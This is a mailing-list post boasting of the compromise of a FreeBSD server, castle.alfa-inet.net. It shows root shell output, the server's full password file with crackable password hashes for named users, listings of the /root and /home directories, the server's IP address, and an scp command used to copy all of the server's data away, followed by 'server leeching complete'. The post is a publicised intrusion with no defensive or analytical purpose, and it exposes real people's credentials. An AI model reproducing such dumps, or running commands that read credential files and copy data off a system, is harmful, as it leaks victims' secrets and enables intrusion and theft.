[<prev] [next>] [day] [month] [year] [list]
Message-Id: <20111120085720.601E865E164@mail.vmail.me>
Date: Sun, 20 Nov 2011 09:57:20 +0100 (CET)
From: airwalker@...il.me
To: full-disclosure@...ts.grok.org.uk
Subject: COMPROMISE LULZ
"I set fire to the rain"
#uname -a;id;
FreeBSD castle.alfa-inet.net 7.2-RELEASE-p8 FreeBSD 7.2-RELEASE-p8 #6: Sat Apr 23 12:52:20 EEST 2011 root@...ecat.alter.org.ua:/usr/src/sys/i386/compile/CAT_v14c i386
uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),80(www)
#cat /etc/master.passwd
# $FreeBSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $
#
root:*:0:0::0:0:Charlie &:/root:/bin/csh
toor:*:0:0::0:0:Bourne-again Superuser:/root:
daemon:*:1:1::0:0:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5::0:0:System &:/:/usr/sbin/nologin
bin:*:3:7::0:0:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533::0:0:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533::0:0:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13::0:0:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8::0:0:News Subsystem:/:/usr/sbin/nologin
man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25::0:0:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26::0:0:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53::0:0:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62::0:0:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64::0:0:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65::0:0:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66::0:0:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6::0:0:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80::0:0:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
ftp:*:14:14::0:0:Anonymous FTP Admin:/var/tmp/ftp:/nonexistent
mysql:*:88:88::0:0:MySQL Daemon:/nonexistent:/sbin/nologin
mrtg:*:279:279::0:0:MRTG daemon:/nonexistent:/sbin/nologin
dhcpd:*:280:280::0:0:DHCP Daemon:/nonexistent:/usr/sbin/nologin
squid:*:100:100::0:0:Squid caching-proxy pseudo user:/usr/local/squid:/usr/sbin/nologin
quagga:*:101:101::0:0:Quagga Daemon:/usr/local/etc/quagga:/sbin/nologin
admin:$1$RS.puxn4$onWnfbJffqkXw/Ea0Kzv01:1001:0::0:0:Administrator:/home/admin:/bin/tcsh
alter:$1$ZTmoV5oC$h70iKYXyOnPa/EOQ5Igzy/:1002:1002::0:0:User &:/home/alter:/bin/tcsh
maxtul:$1$PPPYilLm$JSIqTcjwSDvOn9vQodQgS1:1003:1003::0:0:Max Tulyev:/home/maxtul:/bin/tcsh
triar:$1$NzcMWgQP$YWAvbobzhcPdtOgRqRXZH1:1004:1004::0:0:Artem:/home/triar:/bin/tcsh
kesha:$1$8Adj2DZF$ZWyO6zq0Yku65d1CVwxCC/:1005:1005::0:0:Kesha:/home/kesha:/bin/tcsh
elf:$1$sKue.X7p$FRG1YTlpNVVX5GxXJjEOY.:1009:1009::0:0:Elf:/home/elf:/usr/X11R6/bin/bash
count:$1$55RTwYY6$wWvt/SfP5UBl90r6QrXmY.:1010:1010::0:0:Count:/home/count:/bin/sh
skat:*$1$sg04PvbJ$vPh0EYRNAYiCjMzOI65qf/:1011:1011::0:0:Kirill:/home/skat:/bin/tcsh
phoenix:$1$J.fSJ85F$QhhtEoDf9N4KvSH4ejI1x/:1012:1012::0:0:Vova:/home/phoenix:/bin/tcsh
k291:$1$/5BalgOa$q13rDoinUYdKPlpY84P7v.:1016:1016::0:0:Ilya:/home/k291:/bin/tcsh
gel:$1$xsitPjAq$UkynpBQgSkOu.MUyZLD1y.:1017:1017::0:0:Gel:/home/gel:/bin/tcsh
druid:$1$K5YRYVj9$dbZ39L5LHuGcq0ube1lYs/:1018:1018::0:0:Druid:/home/druid:/bin/tcsh
ezzh:$1$IePEubyf$OgK4QC8kDSJxgiZE1kzT/0:1019:1019::0:0:Ezzh:/home/ezzh:/bin/tcsh
embar:$$1$ntqcCeyE$ltJuKJfnTbPmiWqevaOe1.:1013:1013::0:0:User &:/home/embar:/bin/tcsh
fatipon:$1$uvWORcFL$686Lwh0KypHcAwrlYy3Zc1:1025:1025::0:0:Alexey:/home/fatipon:/bin/tcsh
allenport:$1$.NLILTPS$mNt/RL.R20oOeSiegHbMo/:1006:1006::0:0:AllenPort Inc.:/home/allenport:/bin/sh
info:*:2000:2000::0:0:Alfa-inet info:/home/info:/sbin/nologin
nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/usr/sbin/nologin
castle.alfa-inet.net [62.205.132.50]
ls -la /root/
total 7796
drwxr-xr-x 9 root wheel 1024 Nov 7 01:55 ./
drwxr-xr-x 24 root wheel 512 Apr 21 2011 ../
-rw-r--r-- 2 root wheel 786 Feb 24 2008 .cshrc
-rw------- 1 root wheel 18 Nov 18 18:01 .history
-rw------- 1 root wheel 1133 Jul 28 2009 .joe_state
-rw-r--r-- 1 root wheel 143 Feb 24 2008 .k5login
-rw------- 1 root wheel 686 Nov 7 21:27 .lesshst
drwx------ 2 root wheel 512 Nov 7 02:45 .links/
-rw-r--r-- 1 root wheel 293 Feb 24 2008 .login
drwxr-xr-x 3 root wheel 512 Oct 17 14:54 .mc/
-rw------- 1 root wheel 3111 Sep 30 2009 .mysql_history
-rw-r--r-- 2 root wheel 253 Feb 24 2008 .profile
-rw------- 1 root wheel 1024 Aug 20 2008 .rnd
drwx------ 2 root wheel 512 Jul 8 17:09 .ssh/
-rw-r--r-- 1 root wheel 3711 Jun 7 2008 .tcshrc
drwxr-xr-x 8 root wheel 512 Jan 23 2009 dhcp_probe-1.0.7/
-rw-r--r-- 1 root wheel 176501 Jan 23 2009 dhcp_probe-1.0.7.tar.gz
drwxr-xr-x 8 root wheel 1024 Jan 23 2009 dhcp_probe-1.2.0/
-rw-r--r-- 1 root wheel 186905 Jan 23 2009 dhcp_probe-1.2.0.tar.gz
drwxr-xr-x 8 root wheel 1024 Jan 23 2009 dhcp_probe-1.2.1/
-rw-r--r-- 1 root wheel 190410 Jan 23 2009 dhcp_probe-1.2.1.tar.gz
drwxr-xr-x 8 root wheel 1024 Jan 23 2009 dhcp_probe-1.2.2/
-rw-r--r-- 1 root wheel 200192 Jan 23 2009 dhcp_probe-1.2.2.tar.gz
-rw-r--r-- 1 root wheel 3144316 Jun 22 2009 triar@....214.215.216
ls -la /home
total 152
drwxr-xr-x 23 root wheel 512 Oct 16 13:06 ./
drwxr-xr-x 24 root wheel 512 Apr 21 2011 ../
drwxrwxr-x 2 root operator 512 Jun 9 2010 .snap/
drwxr-xr-x 3 admin wheel 512 Mar 11 2008 admin/
drwxr-xr-x 3 allenport allenport 512 Jul 9 2009 allenport/
drwxr-xr-x 25 alter alter 3584 Nov 4 23:53 alter/
drwxr-xr-x 2 root wheel 28160 Nov 20 05:15 bkp/
drwxrwxr-x 4 root ceo 512 Nov 4 2009 ceo/
drwxr-xr-x 2 count count 512 Dec 1 2009 count/
drwxr-xr-x 3 druid druid 512 Feb 6 2011 druid/
drwxr-xr-x 4 elf elf 512 Aug 21 2010 elf/
drwxr-xr-x 4 embar 1013 512 Aug 24 2010 embar/
drwxr-xr-x 2 ezzh ezzh 512 Mar 11 2011 ezzh/
drwxr-xr-x 2 fatipon fatipon 512 Oct 16 17:03 fatipon/
drwxr-xr-x 2 gel gel 512 Jan 15 2011 gel/
drwxr-xr-x 2 info staff 512 Oct 15 14:56 info/
drwxr-xr-x 5 kesha kesha 512 Apr 25 2011 kesha/
drwxr-xr-x 4 maxtul maxtul 512 Oct 10 17:33 maxtul/
drwxr-xr-x 2 phoenix phoenix 512 Jul 27 2010 phoenix/
drwxr-xr-x 5 root wheel 512 Nov 4 2009 seo/
drwxr-xr-x 3 skat skat 512 Oct 7 2010 skat/
drwxrwxrwx 3 root wheel 3072 Nov 9 18:19 traf_check/
drwxr-xr-x 12 triar triar 1024 Nov 20 09:43 triar/
scp -r root@...tle.alfa-inet.net:* .
server leeching complete...
[http://castle.alfa-inet.net/hurricane2.0.mp3]
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists